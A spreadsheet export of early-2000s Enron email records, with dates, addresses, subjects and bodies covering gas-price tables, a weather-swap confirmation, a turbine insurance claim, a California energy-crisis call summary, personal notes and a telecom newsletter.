&lt;TH align=right valign=bottom width="8%"&gt;&lt;FONT size=-1&gt;&lt;U&gt;Wtd Avg Index&lt;/U&gt;&lt;/FONT&gt;&lt;/TH&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     _x000D_
&lt;TH align=right valign=bottom width="8%"&gt;&lt;FONT size=-1&gt;&lt;U&gt;Change ($)&lt;/U&gt;&lt;/FONT&gt;&lt;/TH&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        _x000D_
&lt;TH align=right valign=bottom width="9%"&gt;&lt;FONT size=-1&gt;&lt;U&gt;Vol (mmBtu)&lt;/U&gt;&lt;/FONT&gt;&lt;/TH&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       _x000D_
_x000D_
&lt;TH align=left valign=bottom width="42%"&gt;&lt;FONT size=-1&gt;&lt;U&gt;Hub Name&lt;/U&gt;&lt;/FONT&gt;&lt;/TH&gt;&lt;/TR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     _x000D_
&lt;/TR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       _x000D_
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            _x000D_
&lt;TR&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;&lt;I&gt;&lt;BR&gt;LOUISIANA&lt;BR&gt;&lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         _x000D_
&lt;TR&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;NOBR&gt;ANR SE&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $1.9200&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $1.7000&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;          $1.7880&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;-&lt;/B&gt;    .0765&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;         220,200&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;American Natural Resources Pipeline Co. - SE  Transmission Pool&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;                                                                                                                                                                                                   _x000D_
&lt;TR&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;NOBR&gt;Columbia Onshore&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $1.8500&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $1.6700&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;          $1.7328&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;-&lt;/B&gt;    .0989&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;         311,200&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;Columbia Gulf Transmission Co. - Onshore Pool &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;                                                                                                                                                                                                          _x000D_
&lt;TR&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;NOBR&gt;Henry Hub&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $1.9900&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $1.7200&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;          $1.8169&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;-&lt;/B&gt;    .0946&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;       1,029,600&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;Henry Hub tailgate - Louisiana &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;                                                                                                                                                                                                                                _x000D_
&lt;TR&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;NOBR&gt;NGPL LA&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $1.9300&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;          $1.7250&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;          $1.7974&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;&lt;B&gt;-&lt;/B&gt;    .0054&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="RIGHT"&gt;&lt;FONT size=-1&gt;         251,200&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN="LEFT"&gt;&lt;FONT size=-1&gt;Natural Gas Pipeline Co. of America, Lo</t>
  </si>
  <si>
    <t>Thu, 5 Oct 2000 08:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ceoextra@houston.org'})</t>
  </si>
  <si>
    <t>frozenset({'jordancapitalmanagment@worldnet.att.net', 'hreasoner@velaw.com', '1watson293@aol.com', 'laboon@lockeliddell.com', 'diana.m.fincher@chase.com', 'rozamora@aol.com', 'jjiles@bear.com', 'vidal@martinez.net', 'klay@enron.com', 'j_royer@tcbhou.com', 'kcaldwell@wvumc.com', 'hgee@harrygee.com'})</t>
  </si>
  <si>
    <t>Final Nominating Committee Meeting Information</t>
  </si>
  <si>
    <t>Attached is the final information for the meeting on Monday, October 9._x000D_
_x000D_
_x000D_
 &lt;&lt;memo of 10-5 1 page.doc&gt;&gt;_x000D_
_x000D_
_x000D_
Office of the President/CEO_x000D_
Greater Houston Partnership_x000D_
(713) 844-3646 (Ph)_x000D_
(713) 844-0246 (Fax)_x000D_
CEOextra@houston.org_x000D_
_x000D_
Visit our web site at www.houston.org_x000D_
_x000D_
_x000D_
 - memo of 10-5 1 page.doc</t>
  </si>
  <si>
    <t>Tue, 23 May 2000 01:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Yipes - Syd vs Melbon - HDD swap</t>
  </si>
  <si>
    <t xml:space="preserve">Jarrod:  So what's the latest with Aquila?  We may have our master signed _x000D_
soon. Sara_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 05/23/2000 08:18 AM -----_x000D_
_x000D_
	David Minns@ENRON_DEVELOPMENT_x000D_
	05/22/2000 10:50 PM_x000D_
		 _x000D_
		 To: Jarrod Cyprow@ECT_x000D_
		 cc: Sara Shackleton@ECT, Heidi Mason/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Raymond Yeow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
		 Subject: Re: Yipes - Syd vs Melbon - HDD swap_x000D_
_x000D_
Jarrod it seems the reference to Sydney time for a Melborne weather _x000D_
transaction could lead to an inconsistency this year. So if a time zone is to _x000D_
be referenced it should be Melbourne. _x000D_
_x000D_
---------------------- Forwarded by David Minns/ENRON_DEVELOPMENT on _x000D_
05/23/2000 02:44 PM ---------------------------_x000D_
_x000D_
_x000D_
David Minns_x000D_
05/23/2000 12:39 PM_x000D_
To: Raymond Yeow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Heidi _x000D_
Mason/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Christian Werner/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Re: Yipes - Syd vs Melbon - HDD swap  _x000D_
_x000D_
I agree this change could cause problems. During September 2000  daylight _x000D_
saving will start early in Sydney during the Olympics. As a result there will _x000D_
be a 1 hour time difference between Sydney and Melbourne.  The local time as _x000D_
reported by the Bureau of Meteorology is Melbourne time. Hence if there is to _x000D_
be a reference to a time zone it should time zone applicable to that _x000D_
location. More generally we should put a definition of "LST "in documentation _x000D_
as meaning the time at the relevant weather station. We could have a _x000D_
circumstance of reference weather stations in difference time zones (eg _x000D_
basket of cities)._x000D_
_x000D_
Heidi can you handle?             _x000D_
_x000D_
_x000D_
_x000D_
Raymond Yeow_x000D_
05/23/2000 12:17 PM_x000D_
To: Heidi Mason/ENRON_DEVELOPMENT_x000D_
cc: David Minns/ENRON_DEVELOPMENT, Christian Werner/ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Yipes - Syd vs Melbon - HDD swap  _x000D_
_x000D_
Dear Heidi,_x000D_
_x000D_
1._x000D_
I confirm that this is now a swap rather than a bought option.  _x000D_
_x000D_
2._x000D_
To DAVID,_x000D_
".... Please let me know if you think this document is acceptable........"_x000D_
_x000D_
Since Jared has replaced LST with Sydney time -_x000D_
_x000D_
should this be Melbourne time instead ?????_x000D_
_x000D_
Rgds Raymond_x000D_
1215pm; 23 May_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Heidi Mason_x000D_
05/23/2000 09:10 AM_x000D_
To: Raymond Yeow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Aquila Australia Weather Confirmation_x000D_
_x000D_
Raymond_x000D_
_x000D_
The confirmation I have received below looks to be the deal we were talking _x000D_
about when I was in Houston. Is this correct? At that stage, were we not _x000D_
talking about there being a significant premium payable at the start of the _x000D_
deal. It appears from the confirmation below that this is now a swap rather _x000D_
than a bought option.  Can you please confirm that this therefore the same _x000D_
deal. _x000D_
_x000D_
Heidi_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Heidi Mason/ENRON_DEVELOPMENT on _x000D_
23/05/2000 09:04 ---------------------------_x000D_
_x000D_
_x000D_
David Minns_x000D_
22/05/2000 17:21_x000D_
To: Jarrod Cyprow/HOU/ECT@ECT_x000D_
cc: Sara Shackleton/HOU/ECT@ECT, Raymond _x000D_
Yeow/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Christian _x000D_
Werner/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Susan _x000D_
Musch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Heidi _x000D_
Mason/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Re: Aquila Australia Weather Confirmation  _x000D_
_x000D_
Jarrod looks fine. For completeness I have noted one minor inconsistency in _x000D_
(v) of the Fallback Data provisions that dates back to my first draft. Our _x000D_
rounding of degrees celsuis is to one decimal point. Hence the reference to _x000D_
whole numbers may not be apropriate in all cases. In practical terms it is so _x000D_
immaterial I question the need to redo the confirmation. Anyway please put _x000D_
together the the confirmation between between Enron Australia Finance Pty. _x000D_
Ltd. and RMT. I have copied in Susan (Tax) and Heidi (Finance) to double _x000D_
check they are fully aware of this arrangement.    _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To: David Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Sara Shackleton/HOU/ECT@ECT _x000D_
_x000D_
Subject: Aquila Australia Weather Confirmation_x000D_
_x000D_
David,_x000D_
_x000D_
I have attached a copy of the Confirmation that we sent to Aquila. They have _x000D_
read it and returned a signed copy to me. Please let me know if you think _x000D_
this document is acceptable. If it is I will go ahead and put together the _x000D_
Transaction between RMT and Australia. If we need to make any changes, I will _x000D_
send a revised copy to Aquila and then do the back to back transaction._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Jarrod Cyprow (713) 853-5700_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Oct 2000 08:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Not Mary Darvauex, not Marlene Dietrich</t>
  </si>
  <si>
    <t xml:space="preserve">Not Mary Darveaux...._x000D_
Not Marlene Dietrich...._x000D_
_x000D_
_x000D_
_x000D_
Ten Cents A Dance_x000D_
Ruth Etting_x000D_
Words by Lorenz Hart and Music by Richard Rodgers (1930)_x000D_
_x000D_
-charted at #5 (1930)_x000D_
_x000D_
_x000D_
Ten cents a dance, that's what they pay me_x000D_
Gosh, how they weigh me down_x000D_
Ten cents a dance, pansies and rough guys_x000D_
Tough guys who tear my gown_x000D_
_x000D_
Seven to midnight I hear drums_x000D_
Loudly the saxophone blows_x000D_
Trumpets are tearing my eardrums_x000D_
Customers crush my toes_x000D_
_x000D_
Sometimes I think I've found my hero_x000D_
But it's a queer romance_x000D_
All that you need is a ticket_x000D_
Come on, big boy, ten cents a dance!_x000D_
</t>
  </si>
  <si>
    <t>Thu, 21 Sep 2000 04:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bryan.hull@enron.com', 'david.baumbach@enron.com', 'harry.bucalo@enron.com', 'gary.lamphier@enron.com', 'steve.venturatos@enron.com', 'phillip.love@enron.com', 'lqcolombo@aol.com', "o'neal.winfree@enron.com", 'michael.walters@enron.com', 'matthew.lenhart@enron.com', 'jason.bass2@compaq.com'})</t>
  </si>
  <si>
    <t>Re:Pick-ups</t>
  </si>
  <si>
    <t>If you want to pick up a player - you need to let me know by today - b/c I _x000D_
will be on vacation tomorrow.</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 00:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'james.bouillion@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'chris.booth@enron.com', 'ben.jacoby@enron.com', 'carlos.sole@enron.com'})</t>
  </si>
  <si>
    <t>RE: Westinghouse "Wet" Turbine</t>
  </si>
  <si>
    <t>I am available to meet this week except 9:00 a.m. to 1:00 p.m. on 5-17-01 and _x000D_
9:30 a.m. to 11:30 a.m. on 5-18-01.  I am traveling Monday, Tuesday and _x000D_
Wednesday of next week._x000D_
_x000D_
We need Seimens Westinghouse to prove the "total loss" claim and I suspect _x000D_
that is why our business people have not pursued them more vigorously.  _x000D_
Carlos, Please call me._x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Sole, Carlos  _x000D_
Sent: Wednesday, May 16, 2001 7:01 PM_x000D_
To: Jacoby, Ben; Booth, Chris_x000D_
Cc: Edison, Andrew; Bouillion, James L.; Studdert, James P.; Mann, Kay_x000D_
Subject: Westinghouse "Wet" Turbine_x000D_
_x000D_
I have involved Andy Edison, one of ENA's litigation managers, in reviewing _x000D_
our potential claims against Westinghouse with respect to the "wet" turbine _x000D_
and the general issue of whether we have any type of "duty to mitigate" the _x000D_
expense of the cost of the replacement generator (ie, whether we have a duty _x000D_
to purchase the replacement generator at $3 mm since its cost might go up.)  _x000D_
Andy has some interesting thoughts and questions, including why we aren't _x000D_
pressing Westinghouse harder with our claim and aren't pressing them harder _x000D_
to hold their price on the replacement generator for a longer time period _x000D_
given their potential exposure to us (arguably we might have a duty to _x000D_
mitigate the expense associated with the replacement generator if we have a _x000D_
reasonable basis for believing that the cost might go up).  Since there are _x000D_
no black and white answers, it probably would be useful to have a meeting to _x000D_
discuss our thoughts and address questions that we and you all may have.  _x000D_
Please let me know your availability to meet either this week or early next.  _x000D_
Lastly, Andy has noted that under our insurance policy we need to bring a _x000D_
lawsuit against the insurance carrier if they to fail resolve our claim _x000D_
before July 2001.  The practical impact of this is that we need to prepare a _x000D_
letter agreement whereby we and the insurance company agree to extend that _x000D_
time period.  Andy has recently prepared such a letter with respect to _x000D_
another claim and has agreed to prepare one for this claim as well.  Thanks.</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 08:38:29 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'carmen.peters@nissan-usa.com'})</t>
  </si>
  <si>
    <t>frozenset({'timdawnsierra@yahoo.com', 'tstaab@enron.com'})</t>
  </si>
  <si>
    <t>Weather Forecast Rain</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
Well, it looks like you definitely will need to bring rain coats, umbrellas etc.  I just checked the 10 day forecast and it shows rain or scattered showers Wed. 11/21 - Sun. 11/25.  The local forecasters are showing rain for Thanksgiving here.   Hopefully it will change before then, last week they said it was going to rain this weekend and now it's going to be sunny and 70's. _x000D_
_x000D_
Love,_x000D_
Mom_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Feb 2001 01:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'paul.garcia@enron.com'})</t>
  </si>
  <si>
    <t>FW: Enron pos.</t>
  </si>
  <si>
    <t xml:space="preserve">Here is the information we looked at on Thursday .  It is updated for our _x000D_
current position.  Through looking at this you will see that our risk is to a _x000D_
significant up move in prices.  Currently, prices are not moving up _x000D_
significantly._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Errol_x000D_
---------------------- Forwarded by Errol McLaughlin/Corp/Enron on 02/26/2001 _x000D_
08:51 AM ---------------------------_x000D_
_x000D_
_x000D_
"Hood, Stephen (NY Int)" &lt;SHOOD@edfman.com&gt; on 02/26/2001 08:16:32 AM_x000D_
To: "'errol.mclaughlin@enron.com'" &lt;errol.mclaughlin@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: FW: Enron pos._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt; If you have any questions, feel free to respond._x000D_
&gt;_x000D_
&gt;  &lt;&lt;Enron NG.pdf&gt;&gt;_x000D_
&gt;_x000D_
&gt; Regards,_x000D_
&gt;_x000D_
&gt; SMH_x000D_
_x000D_
 - Enron NG.pdf_x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 03:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'monica.mack@chase.com'})</t>
  </si>
  <si>
    <t>Re: JP Morgan/Chase Conference</t>
  </si>
  <si>
    <t xml:space="preserve">Monica, this looks great.  Thank you.  SRS_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;Monica.Mack@chase.com&gt; on 01/16/2001 10:31:36 AM_x000D_
To: Jeff.Skilling@enron.com, sherri.sera@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: JP Morgan/Chase Conference_x000D_
_x000D_
_x000D_
_x000D_
Dear Sherri,_x000D_
_x000D_
As we discussed in an earlier e-mail, please find the attached revised bio_x000D_
of Jeff Skilling's for your review and approval for the JP Morgan/Chase_x000D_
Shareholder Value Creation Conference Brochure.  Please know that we try to_x000D_
make all the bios consistent to content and length.  Please advise.  Thank_x000D_
you._x000D_
_x000D_
Regards,_x000D_
Monica_x000D_
(See attached file: Skilling Bio.doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeff.Skilling@enron.com@enron.com on 01/04/2001 04:25:00 PM_x000D_
_x000D_
_x000D_
_x000D_
Sent by:  Sherri.Sera@enron.com_x000D_
_x000D_
_x000D_
To:   monica.mack@chase.com_x000D_
cc:_x000D_
Subject:  JKS bio_x000D_
_x000D_
_x000D_
Monica, per our discussion.  I look forward to working with you._x000D_
_x000D_
Regards,_x000D_
Sherri Sera_x000D_
Assistant to Jeff Skilling_x000D_
713.853.5984_x000D_
713.646.8381 (fax)_x000D_
sherri.sera@enron.com_x000D_
_x000D_
(See attached file: bio.doc)_x000D_
_x000D_
(See attached file: bio.doc)_x000D_
_x000D_
_x000D_
_x000D_
 - Skilling Bio.doc_x000D_
 - bio.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Oct 2000 08:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nlorentzatos@br-inc.com'})</t>
  </si>
  <si>
    <t>lunch change</t>
  </si>
  <si>
    <t>Richard,_x000D_
_x000D_
I just found out I am going to be out of town Wed-Frid, so I won't be_x000D_
available for lunch on Wed.  Can we reschedule for next Tues or Wed?_x000D_
_x000D_
Sorry, but duty calls._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Niko_x000D_
_x000D_
_x000D_
_x000D_
Nickolas J. Lorentzatos_x000D_
Attorney - Litigation_x000D_
Burlington Resources, Inc._x000D_
713-624-9326_x000D_
713-624-9613 (fax)_x000D_
nlorentzatos@br-inc.com</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 13:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rachael.king@elpaso.com', 'lynn.a.lednicky@dynegy.com', 'tom.allen@mirant.com', 'sonnet.edmonds@mirant.com', 'alex.goldberg@williams.com', 'sryan@aesc.com', 'bbailey@duke-energy.com', 'hoffman@blackstone.com', 'skean@enron.com', 'randy.harrison@mirant.com', 'clark.smith@elpaso.com', 'john.harrison@elpaso.com'})</t>
  </si>
  <si>
    <t>Summary of Today's Call/Agenda for Tomorrow's Call</t>
  </si>
  <si>
    <t>Greetings:_x000D_
n order to keep everyone in the loop, the folks on today's call wanted to _x000D_
send out a brief summary of the call for the benefit of those who couldn't _x000D_
make it.  Apologies for any omissions, inaccuracies, etc.  Others who were on _x000D_
the call please chime in if I've gotten anything wrong, or missed anything._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
SUMMARY_x000D_
Enron, Duke, El Paso and Williams were on the call, as was Michael Hoffman of _x000D_
the Blackstone Group (the Governor's financial advisors)._x000D_
On the subject of how the group would organize itself, it was agreed that the _x000D_
calls would be open to anyone who wanted to participate._x000D_
A smaller group consisting of Duke, El Paso, Enron, and Williams would take _x000D_
the lead on walking the halls of Sacramento, meeting with policy makers, and _x000D_
advocating whatever plan the group develops._x000D_
Folks agreed that achieving a comprehesive solution requires a tangible _x000D_
process; that is, the principals need to get in a room, face to face, for _x000D_
however long it takes to work out a resolution._x000D_
It was agreed that the process should start no later than the beginning of _x000D_
next week, and that it should take place in Sacramento._x000D_
It was decided that the Legislature and the Attorney General needed to be _x000D_
brought into the process as soon as possible, i.e., next week._x000D_
There was some discussion regarding the release today of "Plan B."  Plan B is _x000D_
a plan proposed by Democratic and Republican legislators as an alternative to _x000D_
the MOU that the Governor struck with Edison.  After that call I received a _x000D_
copy of "Plan B."  If you'd like a copy please send me your fax number._x000D_
Folks on the call agreed to have the next "supplier-only" call-in meeting on _x000D_
Friday._x000D_
Finally, Michael Hoffman said that they are hoping to have a "ratings agency _x000D_
level" presentation prepared by the end of the week.  The goal of the _x000D_
presentation is to reassure capital markets that the bonds the state seeks to _x000D_
issue are solidly backed by retail rates._x000D_
_x000D_
The Agenda for Tomorrow's Call with the Governor's Staff_x000D_
Item #1:  The Credit Issue_x000D_
Michael Hoffman said that the Governor's office wants to start tomorrow's _x000D_
meeting discussing the creditworthiness issue.  _x000D_
Hoffman said that the Governor's folks are hoping to have completed by the _x000D_
start of tomorrow's meeting a draft of an agreement between the California _x000D_
PUC and CDWR.  The agreement is designed to ensure that DWR gets paid for _x000D_
power services delivered.  _x000D_
If the draft is ready, they'd like to discuss on the call tomorrow.  _x000D_
_x000D_
Item #2:  Identify the Components of a Comprehensive Solution._x000D_
It was agreed that our group should put on the table at tomorrow's meeting _x000D_
the universe of issues that need to be included in a comprehensive solution._x000D_
Enron was asked to take a first stab at what those components are.  The _x000D_
following is a brief outline, which is not intended to be definitive, but a _x000D_
starting point for discussion._x000D_
Utility creditworthiness_x000D_
retail rates must reflect costs_x000D_
Increase supply_x000D_
streamline and otherwise reform the siting process_x000D_
Decrease demand_x000D_
establish real-time pricing_x000D_
implement demand buy-down and other conservation programs_x000D_
Create a real market_x000D_
Remove the State from the power-buying business as soon as possible (e.g., _x000D_
once new rates are in place and utilities are returned to creditworthiness; _x000D_
approximately 3-6 months)_x000D_
Return the procurement role to the utilities_x000D_
Reinstate Direct Access immediately for all customers_x000D_
Within 18-24 months, create a "core/noncore" market structure for _x000D_
electricity, similar to California's market structure for natural gas_x000D_
Keep the industry in the hands of the private sector_x000D_
Reject proposals calling on the State to take over transmission, generation, _x000D_
etc. _x000D_
Resolve outstanding legal claims, investigations, etc._x000D_
Resolution requires certainty and prompt payment (understanding that _x000D_
discounts on receivables is on the table for discussion)</t>
  </si>
  <si>
    <t>Thu, 22 Jun 2000 11:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Credit Union Sponsors 2nd Financial Planning Workshop</t>
  </si>
  <si>
    <t xml:space="preserve">Back by Popular Demand..._x000D_
_x000D_
Due to an overwhelming response from the Enron Federal Credit Union sponsored _x000D_
Financial Planning Workshop in February,_x000D_
we are pleased to announce that a second workshop has been scheduled: _x000D_
_x000D_
Wednesday, June 28 _x000D_
5:00 p.m. - 6:00 p.m. _x000D_
Enron Building, Room 5C2 _x000D_
Cookies and beverages will be served. _x000D_
_x000D_
Each workshop attendee will receive a personal financial management binder _x000D_
that offers detailed information about_x000D_
Risk Management, Cash Management, Investment Planning, Tax Planning, _x000D_
Retirement Planning, and Estate Planning._x000D_
Plus, each attendee will have the opportunity to take advantage of a free _x000D_
financial planning consultation. _x000D_
_x000D_
Roy Varner, Jr., of Horner, Townsend and Kent, a Penn Mutual Company, will _x000D_
lead this informative workshop.  Mr. Varner_x000D_
has been in the Securities Industry for 9 years, and is a Manager at Penn _x000D_
Mutual. He holds a Bachelor of Arts_x000D_
in Psychology from the University of Texas-Austin, and has a Series 7 General _x000D_
Securities License. _x000D_
_x000D_
Family members are welcome to attend.  Seating is limited, so please reserve _x000D_
your seat today via E-mail to amanda.quiller@enron.com._x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 07:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">deal is in at 260._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kerri Thompson@ENRON_x000D_
04/05/2001 02:12 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: apb checkout_x000D_
_x000D_
571497 _x000D_
broker has 260.00_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 15:23:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tr_news_letter@cch.com', 'telecommunications.international@enron.com'})</t>
  </si>
  <si>
    <t>TR Daily, 22 October, 2001</t>
  </si>
  <si>
    <t>_x000D_
--------------------------------------------------_x000D_
_x000D_
Telecommunications Reports presents...._x000D_
_x000D_
                                  TR DAILY_x000D_
                                  Oct. 22, 2001_x000D_
--------------------------------------------------_x000D_
_x000D_
PLEASE NOTE:  This electronic publication is copyrighted by_x000D_
Telecommunications Reports International. Redistribution or_x000D_
retransmission of any part of this electronic publication --_x000D_
either internally or externally -- is strictly prohibited._x000D_
Violation will be cause for immediate termination of your sub-_x000D_
scription and liability for damages.  You may print out one hard_x000D_
copy for your personal use. If you are interested in having this_x000D_
publication sent to colleagues at your company, additional_x000D_
authorized recipients may be added to your subscription for a_x000D_
fee.  Call Subscriber Services, at (800) 822-6338, or send an e-_x000D_
mail to customerservice@tr.com for more details.  If you prefer_x000D_
not to receive TR Daily, please reply to customerservice@tr.com._x000D_
_x000D_
--------------------------------------------------_x000D_
_x000D_
_x000D_
Table Of Contents_x000D_
Click here for the full issue:_x000D_
http://www.tr.com/online/trd/2001/td102201/index.htm_x000D_
_x000D_
FCC MAY RAISE SPECTRUM CAP,_x000D_
EVENTUALLY LIFT IT ENTIRELY_x000D_
http://www.tr.com/online/trd/2001/td102201/Td102201.htm_x000D_
_x000D_
SBC COMMUNICATIONS SHOWS LOW REVENUE GROWTH,_x000D_
PLANS TO CUT SEVERAL THOUSAND JOBS=20_x000D_
http://www.tr.com/online/trd/2001/td102201/Td102201-01.htm_x000D_
_x000D_
U.S. BANKRUPTCY COURT RESCHEDULES NextWave=20_x000D_
HEARING ON DISCLOSURE. STATEMENT_x000D_
http://www.tr.com/online/trd/2001/td102201/Td102201-02.htm_x000D_
_x000D_
CenturyTel TO PAY $2.15B FOR VERIZON's=20_x000D_
ALABAMA, MISSOURI EXCHANGES_x000D_
http://www.tr.com/online/trd/2001/td102201/Td102201-03.htm_x000D_
_x000D_
VERIZON SEEKS END TO UNBUNDLED=20_x000D_
LOCAL SWITCHING_x000D_
http://www.tr.com/online/trd/2001/td102201/Td102201-04.htm_x000D_
_x000D_
CLEARER VISION ON BROADBAND POLICY_x000D_
REQUIRED, 3COM EXECUTIVE SAYS_x000D_
http://www.tr.com/online/trd/2001/td102201/Td102201-05.htm_x000D_
_x000D_
TELECOM EARNINGS ROUNDUP_x000D_
http://www.tr.com/online/trd/2001/td102201/Td102201-06.htm_x000D_
